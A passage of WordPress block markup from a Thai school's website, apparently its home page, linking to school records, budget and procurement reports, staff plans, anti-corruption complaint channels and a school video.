class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Cn1iVFIYcvF-wsm2ot5XYr7h0Cer2z_p/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Cn1iVFIYcvF-wsm2ot5XYr7h0Cer2z_p/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table 